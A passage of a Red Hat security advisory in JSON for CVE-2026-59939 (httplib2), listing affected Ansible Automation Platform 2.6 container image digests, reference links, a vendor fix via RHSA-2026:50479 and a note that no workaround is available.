"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59939"
},
{
"category": "external",
"summary": "RHBZ#2498212",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498212"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59939",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59939"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59939",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59939"
},
{
"category": "external",
"summary": "https://github.com/httplib2/httplib2/commit/87581ad6cf752fe3da2090c59058261d2d00a427",
"url": "https://github.com/httplib2/httplib2/commit/87581ad6cf752fe3da2090c59058261d2d00a427"
},
{
"category": "external",
"summary": "https://github.com/httplib2/httplib2/releases/tag/v0.32.0",
"url": "https://github.com/httplib2/httplib2/releases/tag/v0.32.0"
},
{
"category": "external",
"summary": "https://github.com/httplib2/httplib2/security/advisories/GHSA-j5g9-f88f-gfj3",
"url": "https://github.com/httplib2/httplib2/security/advisories/GHSA-j5g9-f88f-gfj3"
}
],
"release_date": "2026-07-08T19:34:05.150000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
